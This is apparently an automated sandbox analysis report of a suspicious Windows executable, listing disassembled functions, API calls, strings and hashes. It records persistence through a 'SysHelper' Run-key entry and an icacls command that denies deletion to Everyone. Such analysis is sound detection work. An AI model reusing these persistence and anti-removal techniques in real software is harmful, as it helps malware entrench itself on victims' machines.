PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
UuidCreate.RPCRT4(?), ref: 00411EFC
UuidToStringW.RPCRT4(?,?), ref: 00411F14
RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
PathAppendW.SHLWAPI(?,?), ref: 00411F83
CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
DeleteFileW.KERNEL32(?), ref: 00412036
CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
_memset.LIBCMT ref: 00412090
lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
lstrcatW.KERNEL32(?,?), ref: 004120C0
lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
lstrlenW.KERNEL32(?), ref: 004120D7
RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
RegCloseKey.ADVAPI32(00000000), ref: 004120FC
_memset.LIBCMT ref: 00412120
SetLastError.KERNEL32(00000000), ref: 00412146
lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
lstrcatW.KERNEL32(?,?), ref: 0041216D

Strings

icacls ", xrefs: 0041214C
" --AutoStart, xrefs: 004120C2
Shell32.dll, xrefs: 00411E94
D, xrefs: 00412128
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00411D06, 00412064
" --AutoStart, xrefs: 00411DD1
SysHelper, xrefs: 00411D5B, 004120EB
" /deny *S-1-1-0:(OI)(CI)(DE,DC), xrefs: 0041216F
SHGetFolderPathW, xrefs: 00411E9F

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
API String ID: 2589766509-1182136429
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32 ref: 00412235
CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
CloseHandle.KERNEL32(00000000), ref: 00412347

Strings

Psapi.dll, xrefs: 0041228C
EnumProcesses, xrefs: 00412264, 00412299
kernel32.dll, xrefs: 0041224E
EnumProcessModules, xrefs: 0041226C, 004122A1
GetModuleBaseNameW, xrefs: 00412277, 004122AC

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
API String ID: 3668891214-3807497772
Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

Function 00423576 Relevance: 15.3, APIs: 10, Instructions: 258
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 004235B1

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

__gmtime64_s.LIBCMT ref: 0042364A
__gmtime64_s.LIBCMT ref: 00423680
__gmtime64_s.LIBCMT ref: 0042369D
__allrem.LIBCMT ref: 004236F3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
__allrem.LIBCMT ref: 00423726
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
__allrem.LIBCMT ref: 0042375B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
String ID:
API String ID: 1503770280-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

Function 004240F6 Relevance: 7.5, APIs: 5, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsetenvp.LIBCMT ref: 0042404A
__amsg_exit.LIBCMT ref: 00424055
__cinit.LIBCMT ref: 0042405D
__amsg_exit.LIBCMT ref: 00424068
__wwincmdln.LIBCMT ref: 0042406E

Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit$__cinit__wsetenvp__wwincmdln_doexit
String ID:
API String ID: 2587630013-0
Opcode ID: 09217920513a334b6f79b9e541313f96d920471f94f8c93875b1f7a29f43a62f
Instruction ID: 7082b750ddc29103f3c984cb6fc30cb2f1280ee8f42cb5262a6b676f22e3f134
Opcode Fuzzy Hash: 09217920513a334b6f79b9e541313f96d920471f94f8c93875b1f7a29f43a62f
Instruction Fuzzy Hash: F6F0F460709331A9DA3173B37A12B5F1654DF81768FE0054FF600A61C3DE9C8981856E

Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 00427B11

Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8

ExitProcess.KERNEL32 ref: 00427B1A

Strings

i;B, xrefs: 00427B0E

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID: i;B
API String ID: 2427264223-472376889
Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0042FB7B

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22

__tzset_nolock.LIBCMT ref: 0042FB8E

Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
String ID:
API String ID: 1282695788-0
Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 00427F47

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode$__lock_doexit
String ID:
API String ID: 2158581194-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD

Non-executed Functions

Function 00481920 Relevance: 121.3, APIs: 41, Strings: 28, Instructions: 587
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExA.KERNEL32(00000094), ref: 00481983
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
FreeLibrary.KERNEL32(?), ref: 00481AC5
GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
FreeLibrary.KERNEL32(?), ref: 00481C15
LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
FreeLibrary.KERNEL32(?), ref: 00481D45
GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
GetTickCount.KERNEL32 ref: 00481F03
GetTickCount.KERNEL32 ref: 00481FF1
GetTickCount.KERNEL32 ref: 00482066
GetTickCount.KERNEL32 ref: 00482095
GetTickCount.KERNEL32 ref: 004820FB
GetTickCount.KERNEL32 ref: 00482118
GetTickCount.KERNEL32 ref: 00482187
GetTickCount.KERNEL32 ref: 004821A4

Strings

NetApiBufferFree, xrefs: 004819F0
Process32First, xrefs: 00481DDA
NETAPI32.DLL, xrefs: 004819A9
LanmanServer, xrefs: 00481A74
CryptReleaseContext, xrefs: 00481AF6
Module32Next, xrefs: 00481E39
Process32Next, xrefs: 00481DED
Thread32Next, xrefs: 00481E13
Intel Hardware Cryptographic Service Provider, xrefs: 00481B9C
GetQueueStatus, xrefs: 00481C6B
KERNEL32.DLL, xrefs: 0048199C
Module32First, xrefs: 00481E26
ADVAPI32.DLL, xrefs: 00481989
CryptGenRandom, xrefs: 00481AE3
CryptAcquireContextW, xrefs: 00481AD5
GetForegroundWindow, xrefs: 00481C4A
Thread32First, xrefs: 00481E00
Heap32Next, xrefs: 00481DA1
Heap32ListFirst, xrefs: 00481DB4
LanmanWorkstation, xrefs: 00481A26
USER32.DLL, xrefs: 00481C31
GetCursorInfo, xrefs: 00481C58
CreateToolhelp32Snapshot, xrefs: 00481D67
NetStatisticsGet, xrefs: 004819E2
$, xrefs: 00481F7E
CloseToolhelp32Snapshot, xrefs: 00481D7B
Heap32First, xrefs: 00481D8E
Heap32ListNext, xrefs: 00481DC7

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$Library$Load$Free$Version
String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
API String ID: 842291066-1723836103
Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D

Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
__CxxThrowException@8.LIBCMT ref: 00411026

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
__CxxThrowException@8.LIBCMT ref: 00411051
lstrlenA.KERNEL32(?,00000000), ref: 00411059
CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
__CxxThrowException@8.LIBCMT ref: 0041107A
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
__CxxThrowException@8.LIBCMT ref: 004110AB
_memset.LIBCMT ref: 004110CA
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
__CxxThrowException@8.LIBCMT ref: 004110F0
_malloc.LIBCMT ref: 00411100
_memset.LIBCMT ref: 0041110B
_sprintf.LIBCMT ref: 0041112E
lstrcatA.KERNEL32(?,?), ref: 0041113C
CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F

Strings

%.2X, xrefs: 00411128

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
String ID: %.2X
API String ID: 2451520719-213608013
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9

Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00411915
FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
lstrcpyW.KERNEL32(00000000,?), ref: 00411962
lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
lstrcatW.KERNEL32(00000000,?), ref: 0041198B
lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
lstrcatW.KERNEL32(00000000,?), ref: 00411999
lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
_memset.LIBCMT ref: 004119B8
lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC

Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9

LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04

Strings

failed with error , xrefs: 0041196E

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
String ID: failed with error
API String ID: 4182478520-946485432
Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED

Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON

Download Yara Rule

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
_memmove.LIBCMT ref: 0040F9EA
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
_memmove.LIBCMT ref: 0040FADA

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: daf740ff3ac2c3b591e036bdef447c77de08716d8619f20f92381a2c96999064
Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
Opcode Fuzzy Hash: daf740ff3ac2c3b591e036bdef447c77de08716d8619f20f92381a2c96999064
Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
__CxxThrowException@8.LIBCMT ref: 0040E8E4

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
__CxxThrowException@8.LIBCMT ref: 0040E90F
CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
__CxxThrowException@8.LIBCMT ref: 0040E93E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
__CxxThrowException@8.LIBCMT ref: 0040E96F
_memset.LIBCMT ref: 0040E98E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
__CxxThrowException@8.LIBCMT ref: 0040E9B4
_sprintf.LIBCMT ref: 0040E9D3

Strings

%.2X, xrefs: 0040E9CD

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
String ID: %.2X
API String ID: 1084002244-213608013
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9

Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
__CxxThrowException@8.LIBCMT ref: 0040EB17

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
__CxxThrowException@8.LIBCMT ref: 0040EB42
CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
__CxxThrowException@8.LIBCMT ref: 0040EB64
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
__CxxThrowException@8.LIBCMT ref: 0040EB95
_memset.LIBCMT ref: 0040EBB4
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
__CxxThrowException@8.LIBCMT ref: 0040EBDA
_sprintf.LIBCMT ref: 0040EBF4
CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
